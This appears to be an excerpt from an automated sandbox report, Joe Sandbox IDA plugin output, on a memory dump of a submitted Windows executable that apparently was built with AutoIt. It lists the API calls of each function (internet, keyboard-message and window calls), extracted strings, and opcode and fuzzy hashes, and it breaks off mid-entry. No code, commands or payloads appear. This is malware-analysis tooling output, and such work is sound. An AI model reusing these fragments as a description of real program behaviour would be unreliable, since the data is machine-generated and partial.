                                                                      • Instruction ID: e26b536befb2e89e2ba51560b69fb3a8dc937c86fafaf9f25e3b63fbd1760317
                                                                      • Opcode Fuzzy Hash: a50def95b58a68e41ffe438ac3a5736c23e6b89579a29ba555e8b72d164634f2
                                                                      • Instruction Fuzzy Hash: 67518B7061070AEFDB20CF25CC95FAABBB5EB48364F144518F956972E0DB70EA50DB50
                                                                      APIs
                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C9C182
                                                                      • GetLastError.KERNEL32 ref: 00C9C195
                                                                      • SetEvent.KERNEL32(?), ref: 00C9C1A9
                                                                        • Part of subcall function 00C9C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C9C272
                                                                        • Part of subcall function 00C9C253: GetLastError.KERNEL32 ref: 00C9C322
                                                                        • Part of subcall function 00C9C253: SetEvent.KERNEL32(?), ref: 00C9C336
                                                                        • Part of subcall function 00C9C253: InternetCloseHandle.WININET(00000000), ref: 00C9C341
                                                                      Similarity
                                                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                      • String ID:
                                                                      • API String ID: 337547030-0
                                                                      • Opcode ID: ff403cb43d23a92f3d6ac5773857f680b423e023c01e6a47b4699844e464bdbd
                                                                      • Instruction ID: f3bf25ccea99aca2c773b88b372b4e4420a845acc1474b4daa45a846775d18a5
                                                                      • Opcode Fuzzy Hash: ff403cb43d23a92f3d6ac5773857f680b423e023c01e6a47b4699844e464bdbd
                                                                      • Instruction Fuzzy Hash: F0318C71200A41AFDF259FA5DC88B6ABBF8FF58300B10451DF96682620DB30E914ABA0
                                                                      APIs
                                                                        • Part of subcall function 00C83A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C83A57
                                                                        • Part of subcall function 00C83A3D: GetCurrentThreadId.KERNEL32 ref: 00C83A5E
                                                                        • Part of subcall function 00C83A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C825B3), ref: 00C83A65
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C825BD
                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C825DB
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00C825DF
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C825E9
                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C82601
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00C82605
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C8260F
                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C82623
                                                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00C82627
                                                                      Similarity
                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                      • String ID:
                                                                      • API String ID: 2014098862-0
                                                                      • Opcode ID: 8b60f0044c24a9a80dac2c1e5dfdf1da568775b189d7d2aaa794c7286ff0e2ed
                                                                      • Instruction ID: 40ae556efb14eca111ccbf6d9eb20dbf36d6da401440cdbb5423888bb1a5cfd9
                                                                      • Opcode Fuzzy Hash: 8b60f0044c24a9a80dac2c1e5dfdf1da568775b189d7d2aaa794c7286ff0e2ed
                                                                      • Instruction Fuzzy Hash: 8F01BC70290610BBFB2067699CCAF9D3F59DB5EB16F100102F358AF0E1C9F224449AAA
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00C81449,?,?,00000000), ref: 00C8180C
                                                                      • HeapAlloc.KERNEL32(00000000,?,00C81449,?,?,00000000), ref: 00C81813
                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C81449,?,?,00000000), ref: 00C81828
                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00C81449,?,?,00000000), ref: 00C81830
                                                                      • DuplicateHandle.KERNEL32(00000000,?,00C81449,?,?,00000000), ref: 00C81833
                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C81449,?,?,00000000), ref: 00C81843
                                                                      • GetCurrentProcess.KERNEL32(00C81449,00000000,?,00C81449,?,?,00000000), ref: 00C8184B
                                                                      • DuplicateHandle.KERNEL32(00000000,?,00C81449,?,?,00000000), ref: 00C8184E
                                                                      • CreateThread.KERNEL32(00000000,00000000,00C81874,00000000,00000000,00000000), ref: 00C81868
                                                                      Similarity
                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                      • String ID:
                                                                      • API String ID: 1957940570-0
                                                                      • Opcode ID: ba3a6985519ce7059cc40244e91f796abc8a1126bf9a81d608339a3d01acc36f
                                                                      • Instruction ID: c7e58f9a43465c68fdf24034495d76dcfa2807b22fa1b7784328f02c2be779f6
                                                                      • Opcode Fuzzy Hash: ba3a6985519ce7059cc40244e91f796abc8a1126bf9a81d608339a3d01acc36f
                                                                      • Instruction Fuzzy Hash: 1401BFB5240304BFE710AFA5DC8DF5F3BACEB89B11F414521FA05EB1A1C6709810CB20
                                                                      APIs
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C8BCFD
                                                                      • IsMenu.USER32(00000000), ref: 00C8BD1D
                                                                      • CreatePopupMenu.USER32 ref: 00C8BD53
                                                                      • GetMenuItemCount.USER32(00F54868), ref: 00C8BDA4
                                                                      • InsertMenuItemW.USER32(00F54868,?,00000001,00000030), ref: 00C8BDCC
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                      • String ID: 0$2
                                                                      • API String ID: 93392585-3793063076
                                                                      • Opcode ID: 6f4e4a6a41d45ddead3b14ce12eb7347b0c532abc1c2d7bd961d424cceeb9d64
                                                                      • Instruction ID: 3de101d3e3036f6e64d2a50301c9c2d70aeeefc31850b9fff6e424b6607944ec
                                                                      • Opcode Fuzzy Hash: 6f4e4a6a41d45ddead3b14ce12eb7347b0c532abc1c2d7bd961d424cceeb9d64
                                                                      • Instruction Fuzzy Hash: 5A51A070600205EBDF20EFA9D8C4BAEBBF4BF45318F14421AF46197295D770AE45CB69
                                                                      APIs
                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00C8C913
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: IconLoad
                                                                      • String ID: blank$info$question$stop$warning
                                                                      • API String ID: 2457776203-404129466
                                                                      • Opcode ID: 72ce99cf580c15dcb8e3bc92f7be8e03472230cac520bb337c5cdca487cb5d89
                                                                      • Instruction ID: f1efa5eba0a6b45b29a3c9c6bbc0f6fe8fc5244b51eb826c37dfb631b4a5c77c
                                                                      • Opcode Fuzzy Hash: 72ce99cf580c15dcb8e3bc92f7be8e03472230cac520bb337c5cdca487cb5d89
                                                                      • Instruction Fuzzy Hash: 45112B32689706BAA7047B159CC2DAE279CEF2536CB20007BF500A62C2E7745E40637D
                                                                      APIs
                                                                        • Part of subcall function 00C39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C39BB2
                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00CB9FC7
                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00CB9FE7
                                                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00CBA224
                                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00CBA242
                                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00CBA263
                                                                      • ShowWindow.USER32(00000003,00000000), ref: 00CBA282
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00CBA2A7
                                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00CBA2CA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                      • String ID:
                                                                      • API String ID: 1211466189-0
                                                                      • Opcode ID: 5275b22d094b8cc553dc720b25528cc21dc2ee997f695ab1bb341b48fc3bb65e
                                                                      • Instruction ID: 1df0b9feaf004147c0fedb983580c88e2365516dc00d973cc334246d321b1cfc
                                                                      • Opcode Fuzzy Hash: 5275b22d094b8cc553dc720b25528cc21dc2ee997f695ab1bb341b48fc3bb65e
                                                                      • Instruction Fuzzy Hash: 5CB17931600215DBDF14CF68C9C57EE7BB2FF44711F098069ED99AB295DB31AA40CB52
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$LocalTime
                                                                      • String ID:
                                                                      • API String ID: 952045576-0
                                                                      • Opcode ID: e18a6b724dc1fffb1ae1350a55d4194a82ffd188a2c275b3e9c99370bef244ca
                                                                      • Instruction ID: 7a40bdabe331e384dd52ef5cfb12b9d20c5dae186db1634e31cd3bd1c8657882
                                                                      • Opcode Fuzzy Hash: e18a6b724dc1fffb1ae1350a55d4194a82ffd188a2c275b3e9c99370bef244ca
                                                                      • Instruction Fuzzy Hash: 51418065C1021876CB21FBB4C88AACFB7ACBF45710F508562E518F3121FB34E656D3AA
                                                                      APIs
                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00C7682C,00000004,00000000,00000000), ref: 00C3F953
                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00C7682C,00000004,00000000,00000000), ref: 00C7F3D1
                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00C7682C,00000004,00000000,00000000), ref: 00C7F454
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ShowWindow
                                                                      • String ID:
                                                                      • API String ID: 1268545403-0
                                                                      • Opcode ID: dd15b91559f3562e8af21066e60ddca2e6371ca629758afff0c5d11897d6c1f1
                                                                      • Instruction ID: 58c7a4a0aa701df1d0d58157b2ec289248fdf2ccc1cb8ac0405ef8a2c3115c17
                                                                      • Opcode Fuzzy Hash: dd15b91559f3562e8af21066e60ddca2e6371ca629758afff0c5d11897d6c1f1
                                                                      • Instruction Fuzzy Hash: 1D410D31924740BBC7358B2DC8C877E7B91AF56324F148D3CE09B56660C671AA83D751
                                                                      APIs
                                                                      • DeleteObject.GDI32(00000000), ref: 00CB2D1B
                                                                      • GetDC.USER32(00000000), ref: 00CB2D23
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CB2D2E
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00CB2D3A
                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00CB2D76
                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CB2D87
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00CB5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00CB2DC2
                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00CB2DE1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 3864802216-0
                                                                      • Opcode ID: 6a1bd92460d976b4e6b8d53ebe58826b5556d85967f0ef44718fb4a08316dc57
                                                                      • Instruction ID: c71d0bd30a13bbee39730a5068bed730f2e30956d4e561b2a6910cfd45f14afb
                                                                      • Opcode Fuzzy Hash: 6a1bd92460d976b4e6b8d53ebe58826b5556d85967f0ef44718fb4a08316dc57
                                                                      • Instruction Fuzzy Hash: 64317A72201214BFEB218F64DC8AFEB3BADEF49715F044155FE08AA291C6B59C51CBB4
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _memcmp
                                                                      • String ID:
                                                                      • API String ID: 2931989736-0
                                                                      • Opcode ID: bef7f36de8066bbe6393575b13be2d1f5e65c0c30aa53da5ac1e92a044fb8c2e
                                                                      • Instruction ID: e7fa8825f1aa7decfa2e1c48e233f09c50b3fb936d39f33be4a2e2debf4110be
                                                                      • Opcode Fuzzy Hash: bef7f36de8066bbe6393575b13be2d1f5e65c0c30aa53da5ac1e92a044fb8c2e
                                                                      • Instruction Fuzzy Hash: FA21A461650A09BBD6147A218E82FFB335CBF20399F584034FD059A781F7A1EE5193AD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                      • API String ID: 0-572801152
                                                                      • Opcode ID: 99f752ef3ffd0372ed36af30a0c988ba6d04eb954838eb7eef63a3140b797378
                                                                      • Instruction ID: d61a21e56877c4bb47108df6e7632494c154abe8d63588842c7a8b8514707875
                                                                      • Opcode Fuzzy Hash: 99f752ef3ffd0372ed36af30a0c988ba6d04eb954838eb7eef63a3140b797378
                                                                      • Instruction Fuzzy Hash: 35D1B271A0060BAFDF10CFA8C881BAEB7B5BF49348F14C569E915AB291E770DE45CB50
                                                                      APIs
                                                                      • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00C617FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00C615CE
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00C617FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00C61651
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00C617FB,?,00C617FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00C616E4
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00C617FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00C616FB
                                                                        • Part of subcall function 00C53820: RtlAllocateHeap.NTDLL(00000000,?,00CF1444,?,00C3FDF5,?,?,00C2A976,00000010,00CF1440,00C213FC,?,00C213C6,?,00C21129), ref: 00C53852
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00C617FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00C61777
                                                                      • __freea.LIBCMT ref: 00C617A2
                                                                      • __freea.LIBCMT ref: 00C617AE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                      • String ID:
                                                                      • API String ID: 2829977744-0
                                                                      • Opcode ID: 14882b56a5c897c4577e5b25a147d82e669e6a625fb7954caf3b484d65d246df
                                                                      • Instruction ID: 5dc09338d0bfeac252390a12958333360c6e9e26592b31845ae39c1eeb6caed2
                                                                      • Opcode Fuzzy Hash: 14882b56a5c897c4577e5b25a147d82e669e6a625fb7954caf3b484d65d246df
                                                                      • Instruction Fuzzy Hash: 6B91AF72E002169ADB308E75C8C1AEEBBB5EF49312F1C4659EC12E7191DB35DE44DBA0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit
                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                      • API String ID: 2610073882-625585964
                                                                      • Opcode ID: fa15fc9cb2f954bebbf74ed5f4030e457259788b9535ccad9735ad14487884cb
                                                                      • Instruction ID: 1e14d2780d22aef0f2675d75f0b83b769de82f3a099f7a56586d5f4910d8598a
                                                                      • Opcode Fuzzy Hash: fa15fc9cb2f954bebbf74ed5f4030e457259788b9535ccad9735ad14487884cb
                                                                      • Instruction Fuzzy Hash: 2A919371A00216ABDF24CFA5D884FAE77B8EF86718F108559F515EB281D7B09A41CFA0
                                                                      APIs
                                                                      • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00C9125C
                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C91284
                                                                      • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00C912A8
                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C912D8
                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C9135F
                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C913C4
                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C91430
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                      • String ID:
                                                                      • API String ID: 2550207440-0
                                                                      • Opcode ID: da5990d4eefbae406c1d61df4f12738be55397f82efd1836abaad26875defbdf
                                                                      • Instruction ID: 06013543f7294e20975c4f192fe1d5af1aceb7f22a9b8eaeedb620516fb24a91
                                                                      • Opcode Fuzzy Hash: da5990d4eefbae406c1d61df4f12738be55397f82efd1836abaad26875defbdf
                                                                      • Instruction Fuzzy Hash: 7791F275A0021AAFDF00DF94C88ABBEB7B5FF44310F194429E910EB291D774EA41DB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                      • String ID:
                                                                      • API String ID: 3225163088-0
                                                                      • Opcode ID: 2a359caa0e51528e68789725d87d414bf0367bba96ee7ee7471012d88899bbaf
                                                                      • Instruction ID: 25d24148f3bc6943af56a7674fc69419cae7b4bd5c87a74ef0dc406d3955c8f7
                                                                      • Opcode Fuzzy Hash: 2a359caa0e51528e68789725d87d414bf0367bba96ee7ee7471012d88899bbaf
                                                                      • Instruction Fuzzy Hash: 1F911671D00219EFCB11CFA9CC84AEEBBB8FF49320F148659E515B7251D774AA82DB60
                                                                      APIs
                                                                      • IsWindow.USER32(00F549A8), ref: 00CB7F37
                                                                      • IsWindowEnabled.USER32(00F549A8), ref: 00CB7F43
                                                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00CB801E
                                                                      • SendMessageW.USER32(00F549A8,000000B0,?,?), ref: 00CB8051
                                                                      • IsDlgButtonChecked.USER32(?,?), ref: 00CB8089
                                                                      • GetWindowLongW.USER32(00F549A8,000000EC), ref: 00CB80AB
                                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00CB80C3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                      • String ID:
                                                                      • API String ID: 4072528602-0
                                                                      • Opcode ID: 018e507425cdce6aba77556511df4c77aa56dd7d0a3d72a89b8191042466983a
                                                                      • Instruction ID: a66d0516bfd26e2021c76f2d4149dfc4045f212b00425df69e728319c95ae82c
                                                                      • Opcode Fuzzy Hash: 018e507425cdce6aba77556511df4c77aa56dd7d0a3d72a89b8191042466983a
                                                                      • Instruction Fuzzy Hash: 4A71AE34609204AFEF209F94C884FFABBB9EF49340F140559FD65972A1CB31AE45DB24
                                                                      APIs
                                                                      • GetParent.USER32(?), ref: 00C8AEF9
                                                                      • GetKeyboardState.USER32(?), ref: 00C8AF0E
                                                                      • SetKeyboardState.USER32(?), ref: 00C8AF6F
                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00C8AF9D
                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00C8AFBC
                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00C8AFFD
                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C8B020
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      • Opcode ID: be7004bac885188845bf3309c529bc3d80066976d5adc85cada2ddb8dc546804
                                                                      • Instruction ID: 79c149c97e03f907b4b4f65dc23031dd1e43e2e8ff0f83f3ed9b51a18e39e2ad
                                                                      • Opcode Fuzzy Hash: be7004bac885188845bf3309c529bc3d80066976d5adc85cada2ddb8dc546804
                                                                      • Instruction Fuzzy Hash: F25103F06047D13DFB36A2748C45BBBBEA95B06308F08858AF2E9454C2D3D8AED4D759
                                                                      APIs
                                                                      • GetParent.USER32(00000000), ref: 00C8AD19
                                                                      • GetKeyboardState.USER32(?), ref: 00C8AD2E
                                                                      • SetKeyboardState.USER32(?), ref: 00C8AD8F
                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C8ADBB
                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C8ADD8
                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C8AE17
                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C8AE38
                                                                      Memory Dump Source
